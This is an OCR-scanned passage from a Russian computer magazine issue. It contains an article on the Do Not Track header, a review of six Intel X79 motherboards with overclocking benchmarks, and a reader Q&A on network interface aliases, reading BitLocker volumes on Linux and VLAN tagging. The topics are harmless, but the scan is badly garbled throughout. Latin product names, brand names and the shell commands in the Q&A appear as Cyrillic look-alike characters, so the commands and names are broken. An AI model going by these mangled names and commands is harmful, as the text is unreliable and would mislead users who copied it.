что ДАЛЬШЕ? 



Если ты набрал больше 700 баллов, то в центре тестирования откры- 
вается шампанское, с потолка летит конфетти, а из торта выпрыгива- 
ет стриптизерша. Это все сделано для того, чтобы человек сертифи- 
цировался снова и снова. Если экзамен первый, то через несколько 
недель по электронной почте ты получишь подробности своего 
статуса МСТ5 и доступ к сайту сертифицированных специалистов. 

Ну а если экзамен завален... К сожалению, списка вопросов 
и аналитику с ответом, где ты ошибся, тебе не дадут. На руках 
у тебя в любом случае распечатка с результатом и указанием, 
на какой теме какой процент вопросов ты не ответил. Берешь эту 
распечатку и с двойным усердием работаешь над темами, где со- 
вершил больше всего ошибок. Удачи! ^ 
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СЦЕНА 



Мария «МіІгіІІ» Нефедова (ті^гііійгеаі. хакер. ги) 




Словосочетание «сіо поі Ігаск» переводится на русский язык как «не отслежи- 
вать». Сложно представить, что в современном интернете, где за пользова- 
телем шпионят на каждом углу, кто-то добровольно откажется от слежки, не 
правда ли? Тем не менее, на такой шаг недавно пошел Тѵ\/іиег, а разработчики 
уделяюттехнологиям Оо МоіТгаск все больше внимания. 
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□о Моі Тгаск 



Куда попадают ваши данные, 
когда вы ещё даже не успели кликнуть? 
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ШПИОНСКИЕ ИГРЫ 



Слежка за пользователями в наши дни — это биз- 
нес. За юзерами шпионят все комунелень — ана- 
литические сервисы, рекламные сети, социаль- 
ные платформы и та к да л ее. Для этого у них есть 
прекрасная мотивация: все они зарабатывают 
таким образом деньги. Прекрасный пример — 
контекстная реклама, за счет которой «кормятся» 
многие проекты. Без слежки она невозможна. 

Еще один пример — боодіе, поменявший свою 
политику конфиденциальности не в лучшую сто- 
рону и запоминающий буквально каждый клик 
пользователя. Или вспомним отом, что РасеЬоок 
недавно уличил и в добавлении тега <Ьд5оипс1> 
в е-таіі. В качестве звукового файла в письмах 
был указан скрипт на сервере социальной сети, 
который фиксировал обращения к нему и записы- 
вал результаты в логдля последующего анализа. 

Говоря осоциальныхсетях, нельзя неот- 
метить, что многие аналитики уверены: крупные 
социальные сети сидят на золотой жиле — на ин- 
формации, которую люди сами охотно им предо- 
ставляют. Поверь, многие компании действи- 
тельно готовы заплатить миллионы долларов за 
доступ купорядоченным и исчерпывающим дан- 
ным, которыми располагаютсоциальные сети. 
Пока этому мешают этическая сторона вопроса 
и законодательство (тотего раздел, который 
говорит о неприкосновенности частной жизни), 
однако в будущем нас вполне могут ожидать не- 
которые перемены в этой области. Технологии Во 
Моі; Тгаск призваны дать пользователям выбор, 
возможностьотказаться отслежки и сохранить 
хоть какую-то приватность да иных. 



КАК И ЗАЧЕМ ЭТО ПРИДУМАЛИ 



Западные СМИ в последнее время очень много 
пишут о Во Мо^ Тгаск, тем более что поводы име- 
ются. Однако на нашей стороне Атлантики многие 
даже не в курсе, что это такое. 

Итак, как вообще работает этот самый Во Мо 
Тгаск? Все очень просто — это НТТР-за головок, 
который может и меть три значения:! (ВМТ:1) — 
если пользователь не хочет, чтобы за ним 
следили; О — если следить можно; пиІІ — если 
юзеру все равно. Соответственно, если браузер 
отп равляет значение «1», серверные скрипты 
сайта отключаютсбор логов и счетчики. 

Первыми до подобного решения додума- 
лись исследователи Кристофер Согоян и Сид 
Стемм, создав в 2009 году для Ріге^ох прототип 
аддона, который поддерживал данный ВМТ- 




Тѵѵіиегпервым изсоциальныхсетей поддержал Оо МоІТгаск 



заголовок ( сіопоигаск.из і. Впервые механизм был 
реализован в браузере РігеЬх4. В конце 2010 года 
инициативу подхватил Місгозо^С представив 
поддержкуОо Мо^Тгаск механизма в 1Е9.3атем Оо 
Мо^ Тгаск на постоянной основе появился и почти 
во всех браузерах — МогіІІа Ріге^ох, АррІеЗа^агі 
и даже в Орега. Кстати, кроме НТТР-за головка 
ОМТ и соответствующего блока настроек, в Ріге^ох 
добавили ООМ-интерфейсдля проверки работы 
Оо Мо^ Тгаск и управления ею из ЗаѵаЗсгірС 
Ты заметил, что в списке выше нет СИготе? 

Это не ошибка. Корпорация Добра, чей бизнес 
основан на таргетированной рекламе и изучении 
предпочтений пользователей, действительно 
затягиваете внедрением данной функциональ- 
ности в СИготе кактолько может. Пока пользова- 
телям предл а га ют расширение для СИ готе, сде- 
ланное в самой компании, — Кеер Му Ор1;-Ои^5. :) 
Инициатива ОМТ получила широкую популяр- 
ность в США, не в последнюю очередь благодаря 
поддержке Федеральной торговой комиссии 
США, которая практически обязала Конгресс 
ратифицировать систему на законодательном 
уровне. На данный момент Оо Мо^ Тгаск также 
проходитстандартизацию в Консорциуме Все- 
мирной паутины (ѴѴЗС). 



НА ПРАКТИКЕ 



Что ОМТ даетпользователю на практике? Пока 
немногое. У продвинутых параноиков, конечно, 
естьбИоз^егу, ЗсгірІіМо, АсІЫоскРІизІатакжеТог, 
даркнеты и бункер втайге), но менее искушенным 
юзерам сложнее. Самый заметный эффект ОМТ — 
контекстная реклама не будетформироваться 
на основе ранее сохраненных предпочтений. 
Впрочем, если говорить об уже не раз упомянутом 
боодіе, получаетсядовольносмешная штука. 
Если пользователь согласится с сохранением 
соокіе (например, при регистрации на каком-либо 
сервисе, чтобы не вводитье-таіі каждый раз) или 



согласится с рекомендацией видео на УоиТиЬе — 
соокіе будутсохраняться, несмотря на ОМТ. 

Увы, проведенные центром Іп^егпе^апсІ Зосіеіу 
из Стэнфорда исследования подтверждают, 
что именнотаквее и будетобстоять. Аналитики 
проверили поведение 64 компаний — участников 
программы Асіѵегіізіпд Ор1;іоп Ісоп и активных 
сторонников Оо Мо^Тгаск. Выяснилось, чтоЗЗ 
компании продолжаютсохранять соокіе даже 
после того, как пользователь явно отказался от 
сбора информации. 

Однако, несмотря натакие очевидные «дыр- 
ки», хоронить Оо Моі Тгаск никто не торопится. 
Напротив, все более крупные игроки присоеди- 
няются к начинанию. Так, в конце мая поддержку 
функции Оо Моі Тгаск включил Тѵѵіііег! Теперь 
пользователи м и кроблогингового сервиса 
получат больше приватности, отказавшись при 
этом отпросмотра таргетированной рекламы, 
основанной на предыдущем поведении, и более 
релевантныхпредложений сервиса об интерес- 
ныхаккаунтах. 

За океаном инициатива Оо Моі Тгаск вообще 
пришлась ко двору, как уже было сказано выше. 
Например, сенатор Джей Рокфеллер предста- 
вил законопроект под названием Оо-Моі-Тгаск 
ОпІіпеАсіоі2011. Он будет оговаривать единые 
обязательства для всех американских компаний 
в области удовлетворен ИЯ запросов клиентов 
о прекращении слежки в отношении них в сети 
Интернет. Еслизакон будетпринят, он даствоз- 
можностьФедеральнойторговой комиссии США 
наказывать компании, нарушающие приватность 
пользователей. 

Подводя итог, скажу, что на данный момент 
ОМТ в первую очередь подходит рядовому поль- 
зователю, который мало что понимает во всех 
этих премудростях и понятия не имеет, что такое 
соокіе и НТТР-за головок. Но согласись, для на- 
чала уже неплохо. □Г 
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РЕКі^им 



Сергей Плотников 




Д ОБРО ПОЖАЛОВАТЬ 




ТЕСТИРОВАНИЕ МАТЕРИНСКИХ ПЛАТ НА БАЗЕ 
НАБОРА ЛОГИКИ ІМТЕІХ79 ЕХРРЕ55 



• А5РоскХ79 ЕхІгете4-М 

• А5У5 Катраде IV Ехігете 

• Рохсопп Оиапіитіап 1 

• ОІОАВѴТЕ 0А-Х79-и05 

• Іпіеі 0Х795І 

• М5ІХ79МА-0045 



ТЕСТОВЫЙ СТЕНД 



Процессор: 

Іп1еІСогеі7-3960Х,3,ЗГГц 

Кулер: 

ТЙегтаІІаке Ргіо ОСК 

Видеокарта: 

МЗІТѵѵіп РГ 02 Г II НО 5830, 1024 Мб 

Оперативная память: 

0.5кіІІРЗ-17ОООС19О-8еВХМ, 

4x4 Гб 

Накопитель: 

Сог5аігС55О-Р1206В2, 120 Гб 

Блок питания: 

ЕМЕВМАХРІа1ітах,750 Вт 

ОС: 

ѴѴіпсІоѵѵз 7 Максимальная 



мокинг идеально выглажен, туфли 
начищены до зеркального блеска, 
шикарный лимузин заказан — пришло 
время ехать за покупками. Именно в таком 
виде, ведь не каждый день знакомишься с то- 
повыми платформами Іпіеі. И не каждый день 
тратишь столько денег на настольный ПК. 

Собрать систему на базе Іпіеі Х79 Ехргезз 
дорогого стоит. В буквальном смысле этого 
слова. Чуть забегая вперед, скажем, что плату 
для Іпіеі Вапсіу Вгісіде-Е на сегодняшний день 
дешевле, чем за 200 баксов, не найти. Про- 
цессор обойдется минимум в 350 долларов. 

А еще наверняка захочется четырехканальный 
набор памяти. В общем, если на глаз прики- 
нуть общую стоимость связки «процессор — 
плата — память», то получится в итоге что-то 
около 25-30 тысяч рублей. А ведь еще нужно 
обзавестись видеокартой, накопителями, 
охлаждением, питанием и поместить все это 
«железо» в симпатичный и практичный кор- 
пус. Итак, если тебя не отпугивают гипотети- 
ческие траты, добро пожаловать в клуб! 

ТОПОВЫЙ! 

И этим все сказано. Нет, сам чипсет не являет- 
ся чем-то экстраординарным и удивительным. 
Мы уже писали, что по своим характеристикам 
Іпіеі Х79 Ехргезз сильно напоминает Іпіеі Р67 
Ехргезз и Іпіеі 268 Ехргезз. Только топовый 
набор логики вобрал в себя все самое лучшее. 
Например, поддержку 550-кеширования 
и разблокированный ВСЕК. Сам чипсет по- 
прежнему генерирует до четырнадцати портов 
115В 2.0, до четырех 5АТА-ІІ и до двух 5АТА 3.0. 
Но самое главное в Іпіеі Х79 Ехргезз — это 
поддержка Іпіеі 5апс1у ВгісІде-Е. Уже встроен- 



ные контроллеры процессора наделяют платы 
40 линиями РСІ Ехргезз 3.0 и поддержкой 
четырехканальных наборов памяти ООРЗ. 
Наконец, только Іпіеі 5апс1у ВгісІде-Е «одаря- 
ет» системы самой высокой производитель- 
ностью, равной которой нет на сегодняшний 
день. Во многом за счет шести физических 
ядер, двенадцати виртуальных потоков, высо- 
кой номинальной частоты и отличного разгон- 
ного потенциала. Но об этом подробнее читай 
в большом тесте центральных процессоров. 

МИФЫ И ЛЕГЕНДЫ Х79 

Поддержка тех же стандартов РСІ Ехргезз 3.0 
и четырехканальной памяти дает прирост про- 
изводительности над остальными системами 
только на бумаге. Тех же устройств с под- 
держкой экспресс-линий третьего поколения 
не так много. Если быть скрупулезно точным, 
то лишь видеокарты АМО Рабеоп НО 79ХХ 
поддерживают РСІ Ехргезз 3.0. В то же время 
уже доказано, что результаты, полученные на 
системе с РСІ Ехргезз 2.0, ничем не отличают- 
ся от результатов, полученных на базе нового 
стандарта. Следовательно, адаптер не может 
«прокачать» даже вторую ревизию графиче- 
ского интерфейса. 

То же самое касается поддержки четырех- 
канальной памяти. Прирост от использования 
сразу квартета модулей ООРЗ есть, но он не 
существенен. Поэтому лучше вложиться в та- 
кого же объема набор, но с большей частотой, 
пусть и работающий в двухканальном режиме. 

МЕТОДИКА ТЕСТИРОВАНИЯ 

Радостная новость: частота тактового гене- 
ратора «мам» разблокирована. Поэтому мы 



просто не могли не проверить оверклокерский 
потенциал сегодняшних подопытных. Для чего 
множитель процессора был снижен до отметки 
х25, а памяти - до хІЗ.ЗЗ. Сам понимаешь, что 
нам важен результат разгона именно плат и мы 
не хотим, чтобы показатель ВСЕКуперся в по- 
тенциал системы охлаждения либо разгонный 
потенциал СРЕІ и РАМ. Как известно, практиче- 
ски все платы наделены функцией СРЕІ 5ігар, 
позволяющей автоматически устанавливать 
частоту шины на отметках 125, 166 и 250 МГц. 

В предыдущих номерах мы уже выдвинули 
предположение, что порог в 125 МГц сможет 
преодолеть только половина материнских плат. 
А вот разогнаться по шине до 166 МГц смогут 
единицы, и то лишь при помощи экстремальных 
систем охлаждения. Ну а сказки про «оверклок 
тактового генератора до 250 МГц» можно найти 
на верхней полке, в разделе научной фанта- 
стики. В итоге мы решили отправной точкой 
назначить параметр в 125 МГц. Если плата 
способна стабильно работать при такой ско- 
рости — зачет и уважуха. Для примера с таким 
результатом можно разогнать самый младший 
Іпіеі 5апс1у ВгісІде-Е — Іпіеі Соге 17-3820 — до 
125 X 36 = 4500 МГц при помощи воздушной СО. 
Для счастья большего и не надо! 

Напоминаем, что результаты разгона кон- 
кретной модели платы индивидуальны. Это не 
означает, что вся линейка «мам» конкретного 
бренда будет обладать схожим оверклокер- 
ским потенциалом. 

Уже после определения максимальной ста- 
бильной частоты тактового генератора в ход 
шли процессорозависимые бенчмарки ѵѵРгіте 
1.55 (паттерн 1024т), ѴѴіпРАР 4.0 (многопоточ- 
ный режим) и 5ирег Рі 1.5X5 (режим 1т). 
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А5К0СКХ79 ЕХТКЕМЕ4-М 



ІА 



кто сказал, что Х79-платам форм-фактора пгіАТХ не быть? 
Данный тип устройств имеет право на существование! 

Ведь никто не запрещал собирать сверхмощные системы 
в миниатюрных корпусах. Тем не менее, в линейке плат Ехігете 
есть полноценные АТХ-модели АВРоск ЕхІгетеЗ, Ех1гете4, 
ЕхІгетеббВ, Ехігете? и Ех1гете9. 

В то же время форм-фактор пгіАТХ хочешь не хочешь, но в угоду 
компактности ограничивает функциональность платы. Так, на тек- 
столите распаяно всего три слота РС! Ехргезз х16 и еще один РСІ. 
Работают РЕС по схеме х16 + х16 + х8. Но ни о каком 3-ѴѴау ВЫ или 
3-ѴѴау СгоззРігеХ речи не идет: уж слишком близко расположены 
порты. С другой стороны, вряд ли кто-то будет на базе ппАТХ-платы 
собирать подобную систему. А вот ВЫ/СгоззРігеХ — пожалуйста! 

И все же на АВРоск Х79 Ех1гете4-М осталось местечко для 
оверклокерских улучшений в виде кнопок включения/перезагруз- 
ки ПК и индикатора РОВТ-кодов. На задней панели есть клавиша 
обнуления настроек ВІОВ. 

Чипсет охлаждается небольшим радиатором с вентилятором. 
Поначалу мы было подумали, что «карлсон» неисправен. Потому 
что во время работы он не крутился. Но стоило установить доста- 
точно мощную видеокарту, разогревающую воздух вокруг себя, как 
ветродуй подал признаки жизни — активировался режим Х-РАМ. 

С разгоном у нашей испытуемой, к сожалению, не все в поряд- 
ке. Потратив достаточно времени, мы так и не нашли опцию СРІІ 
Вігар, автоматически увеличивающую частоту шины до 125 МГц. 
«Разгоним сами», - подумали мы. Но тут АВРоск Х79 Ех1гете4-М 
заупрямилась. Шина выше отметки 105 МГц гнаться отказалась. 







іцИМ 

> 









АЗиЗ КАМРА6Е ІѴЕХТКЕМЕ 

тведенного под описание устройства места, к сожалению, 
■ не хватит, чтобы рассказать о всех «вкусностях» АВІІВ 
Ратраде IV Ехігете. Думаем, начать стоит с функцио- 
нала платы. Так, на текстолите распаяно сразу пять слотов РСІ 
Ехргезз ХІ6. Красные работают согласно схеме х16 + х16 + х16 + х16. 
Серый — в режиме х8. Что интересно, при таком количестве РЕС- 
портов осталось место для одного РСІ Ехргезз х1. 

Несмотря на то что АВІІВ Ратраде IV Ехігете относится к ли- 
нейке геймерских плат РоС (РериЫіс оі" Сатегз), «улучшайзеров» 
по разгону у нее больше, нежели у платы из какой-нибудь оверкло- 
керской линейки. Так, в ОС 2опе находятся клавиши включения/ 
перезагрузки платы, индикатор РОВТ, индикатор загрузки фаз 
питания и клеммы для подключения мультиметра. Еще есть пере- 
^ ключатели РСІ Ехргезз, а также переключатели модов ЕМ2 и ВІоѵѵ. 
Ничего не забыли? 

Забыли! В комплекте с платой идет специальное приспособле- 
ние — ОС Кеу. Подключаемый к 1/0 видеокарты, он может выводить 
поверх основной картинки ѴѴіпсІоѵѵз экран ВІОВ. И уже в режиме ре- 
ального времени позволяет настраивать основные параметры си- 
стемы. Что очень удобно, если запланирована долгая бенч-сессия 
или же многочасовая проверка стабильности работы компьютера. 

За стабильность, кстати, отвечает подсистема питания Ехігете 
Епдіпе Оіді+ II. За охлаждение цепи питания и чипсета отвечает 
цепь радиаторов, соединенных одной тепловой трубкой, и с рас- 
положенным на южном мосту вентилятором. Работает «карлсон» 
хоть и эффективно, но довольно шумно. 

Думаем, после перечисления всех заслуг АВІІВ Ратраде IV 
Ехігете лишний раз о результатах тестирования говорить не стоит. 
Частота 133 МГц — лучший показатель в сегодняшнем тесте! 
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РЕКким 




рохсомм оиднтиміАн і 



нешнии осмотр «мамы» показал, на что мы можем рассчи- 
тывать. На плате распаяны кнопки включения/перезагрузки 
системы. В районе слотов ОІММ помимо ІЕО-индикатора 
Р05Т-КОДОВ есть клавиши, позволяющие легко и быстро разогнать 
процессор и память. Портов для оперативки всего четыре. Именно 
поэтому Рохсопп Оиапіитіап 1 поддерживает максимум 32 Гб памяти. 

За графику отвечают сразу четыре слота РСІ Ехргезз х16. Пару 
видеокарт лучше установить в красные порты. Они будут работать по 
схеме ХІ6 + х16. Разводка компонентов выполнена таким образом, что 
кулеры адаптеров накроют нижестоящие РСІ Ехргезз х1 и РСІ. При 
использовании большего числа видеокарт слоты РСІ Ехргезз х16 будут 
работать по схеме х16 + х8 + х8 + х8. 

Перейдем к разгону. ВІ05 материнской платы не оснащен графи- 
ческой оболочкой, и это здорово! Во вкладке РегІ'огтапсе находятся 
все основные опции для разгона. Но о точечной настройке можно 
забыть. К тому же новичку будет тяжело разобраться в этом ВІОЗ'е. 

Нет цветовых индикаций напряжений. Если не знать номинальные 
показатели ѴСоге, ѴТТ и памяти, то легко запутаться. Например, нигде 
не указано, что номинальное напряжение процессора равно 0,97 В. 
Есть лишь абстрактное понятие Ое^аиІЕ В итоге после небольшой при- 
тирки к аскетичному ВІОЗ'у Рохсопп Оиапіитіап 1 нам удалось выжать 
132,5 МГц по шине. Отличный результат! Второй в тесте! 



6ІСАВѴТЕСА-Х79-и05 



|м 



атеринская плата 0І6АВУТЕ 6А-Х79-СЮ5 — вторая в табели 
о рангах Х79-п лат легендарной тайваньской компании. 

На текстолите форм-фактора Е-АТХ распаяно восемь слотов 
ОІММ, три порта РСІ Ехргезз х16, парочка РСІ Ехргезз х1 и один РСІ. 
Есть на плате и внешняя кнопка Роѵѵег, напоминающая скорее красную 
кнопку президента. На задней панели разместились клавиши ОС-ОиаІ 
ВІ05, позволяющая переключаться между прошивками, и СІеаг СМ05. 
Но больше всего дух захватывает от гигантского количества 5АТА- 
портов. Да на базе 6І6АВУТЕ 6А-Х79-СІ05 можно соорудить богатыр- 
ский сервер или профессиональную станцию! 

Также в комплекте с «пятой» идет внешняя РСІ-Е-плата — она же 
ВІиеІооіЬ- и ѴѴі-Рі-адаптер. Причем «синий зуб» поддерживает по- 
следний, четвертый стандарт. 

Технологии 30 Роѵѵег и 30 ВІ05 никуда не делись. Но мы заме- 
тили странную особенность: что на 6І6АВУТЕ 6А-Х79-СІ03, что на 
6І6АВУТЕ 6А-Х79-005 прошивка слегка подтормаживает, особенно 
когда меняешь множители или частоту шины. Но на результаты это 
никак не влияет. После небольших оверклокерских ухищрений нам 
покорилась частота 130 МГц — достойный результат. 




ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 



Память: 

Слоты расширения: 
Дисковые контроллеры: 
Сеть: 

Звук: 

Разъемы на задней панели: 



Форм-фактор: 




4Х00РЗ, 1066-2400 МГц 
ЗхРСІ Ехргеззхіб, ІхРСІ 
4х5АТА11,Зх5АТА3.0, ІхеЗАТАЗ.О 
ЕЩегпеІ, 10/100/1000 Мбит/с 

7.1 СН,Н0А 

6хи5В2.0,2хи5В3.0,2х5/РОІР, 
ІхеЗАТА, ІХІЕЕЕ1394, 1хРЗ-45,2хР5/2, 
бхаудио 
тАТХ 



8Х00РЗ, 1066-2400 МГц 

бхРСІ Ехргеззхіб, ІхРСІ Ехргеззхі 

4Х5АТА II, 4Х5АТА3.0, 2хе5АТА3.0 

ЕЩегпеС 10/100/1000 Мбит/с; ВІиеіооЩ ѵ2.1 

+ Е0Р 

7.1 СН, НОА 

8хи5В2.0,4хи5В3.0, ІХ5/Р0ІР, ІхВІиеЮоЩ, 
2хе5АТА, 1хРЗ-45, 1хР5/2, бхаудио 

Е-АТХ 



4Х00РЗ, 1066-2400 МГц 
4хРСІ Ехргеззхіб, ІхРСІ Ехргеззхі, ІхРСІ 
6Х5АТА II, 4Х5АТА3.0, 2хе5АТА 3.0 
ЕіНегпеС 10/100/1000 Мбит/с 

7.1 СН, НОА 

6x05В 2.0, 2x05В 3.0, 1 х5/Р0ІР, 2хе5АТА, 
2хРЗ-4б, ІХР5/2, бхаудио 

АТХ 
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ІМТЕЬ 0X7951 



талон! Пожалуй, так можно смело величать материнку Іпіе! 
0X7951. Какже еще назовешь устройство, если в Іпіе! самостоя- 
тельно разработали плату специально для своих же процессо- 
ров? И как всегда, символом топовых «мам» іпіе! серии Ехігете Есіібоп 
служит зловещий череп. 

іпіе! 0X795! может нас побаловать восемью слотами ОІММ, позволяю- 
щими задействовать сразу 64 Гб оперативной памяти в четырехканаль- 
ном режиме. Кроме того, на текстолите «мамы» распаяно три слота РС! 
Ехргезз ХІ6, функционирующих согласно схеме х16 + х16 + х16. Нашлось 
местечко и для двух РС! Ехргезз х1, а также одного РСІ. Наличие всего 
шести 5АТА-портов подтолкнуло нас к мысли, что кроме способностей 
чипсета іпіе! Х79 Ехргезз никаких дополнительных контроллеров за- 
действовано не было. Но это не так. Героиня этих строк, например, осна- 
щена сразу двумя гигабитными сетевыми адаптерами. Также іпіе! 0X795! 
обладает встроенным модулем В!иеІооіЬ и ѴѴі-Рі. Есть и 05В 3.0. 

Разгонный потенциал !п1е! 0X795! не порадовал. Максимум, что 
нам удалось выжать из подопытной, — 104,7 МГц по шине. Это худший 
результат среди всех испытуемых. При этом плата имеет ряд оверкло- 
керских фич. Например, внешние клавиши управления системой и 
ЕЕО-индикатор Р05Т-кодов. Впрочем, покопавшись в архивах ресурса 
ЬѵѵЬоЕогд. мы наткнулись на результат итальянского оверклокера 
ОЕЕЕУ, разогнавшего !п1е! 0X795! по шине до 135 МГц. 





М5ІХ79МА-6045 



|М 



атеринская плата М5! Х79МА-6045 — пример компромис- 
са небольших габаритов и высокой производительности. 

У героини этих строк есть только самое необходимое! 
Четыре слота 0!ММ вполне хватит, чтобы заставить свои «мозги» 
работать в четырехканальном режиме. Плата поддерживает до 
64 Гб оперативной памяти с частотой 2400 МГц. А вот пары РС! 
Ехргезз ХІ6 3.0 вполне хватит, чтобы воспользоваться услугами 
массивов видеокарт. Правда, если данная затея претворится 
в жизнь, придется распрощаться с нижестоящими РС! Ехргезз х1. 

В последнее время все материнские платы М5! снабжаются 
компонентами Мі!і1агу С!азз. Устройства на базе набора логики !п1е! 
Х79 Ехргезз не являются исключением. За основу взяты мосфеты 
0гМ05 !!, способные выдержать до 130 градусов Цельсия нагруз- 
ки, дроссели 5РС, Ні-с конденсаторы и обычные твердотельные 
конденсаторы. В совокупности получаем сверхнадежную «мать» 
с низким энерговыделением. Ну просто сказка! 

В тестовой лаборатории нам удалось разогнать плату по шине 
до 130 МГц. Отличный результат, учитывая стоимость устройства. 




8Х00РЗ, 1066-2133 МГц 

ЗхРСІ Ехргеззхіб, 2хРС1 Ехргеззхі, ІхРСІ 

4х5АТА11,6х5АТА3.0,2хе5АТА3.0 

ЕіІ-іегпе1, 10/100/1000 Мбит/с; ВІиеІооЩ ѵ4.0; 

ѴѴІ-РІ 802.1ІП 

7.1 СН, НОА 

7хизВ 2.0, 2хизВ 3.0, 1 Х5/Р0ІР, 2хе5АТА, 

1 X ІЕЕЕ 1394, 1 X РЗ-45, 1 х Р5/2, бхаудио 



8Х00РЗ, 1066-2400 МГц 
ЗхРСІ Ехргеззхіб, 2хРСІ Ехргеззхі, 
ІХРСІ, 4Х5АТА II, 2Х5АТА 3.0 
ЕЩегпеС 10/100/1000 Мбит/с; 
ВІиеІооЩ; ѴѴі-Рі 
ЮСН, НОА 

6x05В 2.0, 2x05В 3.0, ІХ5/Р0ІР, 
ІХІЕЕЕ 1394, 2ХРЗ-45, бхаудио 



4Х00РЗ, 1066-2400 МГц 

2хРСІ Ехргезз ХІ6, 2хРСІ Ехргезз х1 

4х5АТАІІ,2х5АТА3.0 

ЕіНегпеС 10/100/1000 Мбит/с 

7.1 СН,Н0А 

6x05В 2.0, 2x05В 3.0, 2Х5/Р0ІР, 
ІхРЗ-46, ІХР5/2, бхаудио 



Е-АТХ 



АТХ 



тАТХ 



ДЕВУШКИ ИЗ ВЫСШЕГО ОБЩЕСТВА 

Все материнские платы, принявшие участие 
в сегодняшнем тесте, достойны стать осно- 
вой высокопроизводительной системы. Но 
если все же попробовать абстрагироваться от 
конкретного бренда, то мы бы хотели выделить 
в первую очередь А5У5 Ратраде !Ѵ Ехігете с ее 
суперским функционалом, подкрепленным еще 
и высокой надежностью и отличным разгонным 
потенциалом. И Рохсопп Оиапіитіап 1 — за те 
же самые плюсы, но по более выгодной цене. 
Соответственно, Роб-плата получает награду 
«Выбор редакции», а Оиапіитіап 1 — «Лучшая 
покупка», зс 
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РЕЗУЛЬТАТЫ ТЕСТОВ 



ЖРКІМЕ 1.55 1024М, с 

М5І Х79МА-6045 
Іп^еІ 0X7951 
6І6АВУТЕ 6А-Х79-005 
РОХСОММ ОиапШтіап 1 
А505 Ратраде IV Ех^геіпе 
А5РоскХ79 Ех1гете4-М 

О 50 100 150 200 250 

Перед тобой наглядный пример, как частота процессора и памяти может влиять 
на производительность всей системы 




5иРЕКРІ1.5Х51М,С 



М5І Х79МА-6045 
Іп^еІ 0X7951 
6І6АВУТЕ 6А-Х79-005 
РОХСОММ ОиапШтіап 1 
А5СІ5 Ратраде IV Ех^гете 
А5РоскХ79 Ех1гете4-М 

Схожая ситуация и в тесте 5ирег Рі 1.5X5 




о 2 4 6 8 10 12 14 18 20 



ВСІК, МГЦ 



М5І Х79МА-6045 
Іп^еІ 0X7951 
6І6АВУТЕ 6А-Х79-005 
РОХСОММ ОиапШтіап 1 
А5СІ5 Ратраде IV Ех^гете 
А5РоскХ79 Ех^гете4-М 




Не все платы побаловали нас хорошим разгонным потенциалом. Жаль, очень жаль 



ЖІНКАК, КБ/С 

М5І Х79МА-6045 
Іп^еІ ОХ795І 

6І6АВУТЕ 6А-Х79-005 
РОХСОММ ОиапШтіап 1 



“I 

4000 



А5СІ5 Ратраде IV Ех^гете I 
А5Роск Х79 Ех^гете4-М I 



о 500 1000 1500 2000 2500 3000 3500 

Материнская плата Іпіеі продемонстрировала самый низкий результат, а А51І5 Ратраде IV Ехігете — самый высокий 
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ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НА РАО(аКЕА1.ХАКЕР.Ки 



Можно ли назначить одному сетевому 
интерфейсу несколько разных ІР- 
адресов из разных подсетей и если да, то как 
это сделать? 

Потребность в этом действительно может 
возникнуть в случае, если сетевая карта 
всего одна, а коммутатор подключен к не- 
скольким разным сетям. Современные 
операционные системы включают в себя 
механизмы назначения алиасов для сетевых 
интерфейсов, позволяющие решать подобные 
задачи. В Ыпих для этого используется ікопЯд: 

і-Рсопб^ е1:ІіѲ:а1іа5І 

Здесь аііазі — имя нового алиаса. 

В ѴѴіпсІоѵѵз нужная нам настройка прячется 
в окне дополнительных свойств ТСР/ІР. На 
вкладке «Параметры ІР» можно добавить до- 
полнительные ІР-адреса для интерфейса и на- 
значить соответствующие маски подсетей. 

Можно ли работать с разделами, 
зашифрованными при помощи ВіІІоскег, 
из-под Ыпих? 

Напомню, что ѴѴіпсІоѵѵз начиная с Ѵізіа 
поддерживает механизм дискового 
шифрования ВіІІоскег. Так как это проприетар- 
ный механизм, работа с шифрованными 
томами в альтернативных операционных 



системах несколько осложняется. К счастью, 
в решении этой проблемы нам может помочь 
кроссплатформенная (Ыпих / Мае 05 X) утилита 
сіізіоскег ( ЫТІѵ/сІізІоскег ]. Она позволяет произ- 
водить чтение из образов «забитлоченных» 
томов в одном из двух режимов, который 
выбирается на этапе компиляции. В первом 
режиме осуществляется полное дешифрова- 
ние тома в файл, который впоследствии можно 
примонтировать как полноценную файловую 
систему МТР5. (Понятное дело, в случае 
с большими объемами данных процесс 
дешифрования может затянуться.) Второй 
метод позволяет получить виртуальный 
раздел при помощи РІІ5Е. Дешифрование при 
этом выполняется на лету, по мере обращения 
к содержимому (моментально получаем доступ 
к файлам, но немного теряем в быстродей- 
ствии). Для восстановления утилита может 
использовать как ключевой файл с 115В- 
носителя, так и пароль. В качестве входных 
параметров достаточно указать лишь путь 
к образу тома, ключ и точку монтирования. 

Как настроить тегирование трафика для 
определенной ѴІАЫ? 

Как правило, присвоение трафику тегов, 
относящих его к той или иной ѴІАМ, 
осуществляется средствами коммутаторов. Но 
в случае, если порт, через который мы подклю- 



чаемся, настроен как Ігипк (то есть может 
принимать уже только фреймы с пометками, 
чтобы коммутатор знал, куда их направлять), 
всё в наших руках. Нам надо лишь назначить 
нужный ѴІАМ Ю на выходе нашего сетевого 
интерфейса. В Ыпих нам понадобится 
подключить модуль ядра 8021р, обеспечиваю- 
щий программную модификацию ЕіЬегпеІ- 
фреймов. 

зисіо шосІргоЬе 8021ц 

После загрузки модуля можно воспользо- 
ваться утилитой конфигурации ѵсопЛд (если 
по каким-либо причинам этой утилиты еще нет 
в системе, ее можно найти в составе пакета 
ѵіап). Итак, назначаем ѴІАМ Ю = 1337 интер- 
фейсу еіЫ: 

зисіо усопб^ асіеі е1:Іі1 1337 

При этом создается виртуальный сетевой 
интерфейс с алиасом еіЫ.1337, для которого 
можно задать отдельный МАС- и ІР-адрес. Его 
исходящий трафик помечается как принад- 
лежащий ѴІАМ с Ю 1337. В ѴѴіпсІоѵѵз, к со- 
жалению, назначать теги можно только в тех 
случаях, когда сетевая карта поддерживает 
работу с тегированным трафиком. Если такая 
карта имеется, то дело остается за фирмен- 









КАК УДОБНЕЕ ВСЕГО РЕВЕРСИТЬ ПРИЛОЖЕНИЯ ДЛЯ ІРНОМЕ? 



Так уж исторически сложилось, что лучшим 
другом реверсора является ЮА от Нех-Рауз. 
Этот инструмент позволяет изучить вну- 
тренности приложений, разработанных для 
самых разных платформ, в том числе и для 
мобильных. Правда, чтобы он был полезен для 
изучения работы приложений для І05, его надо 
уметь правильно «готовить». Расскажу тебе, 
как настроить среду для удаленной отладки 
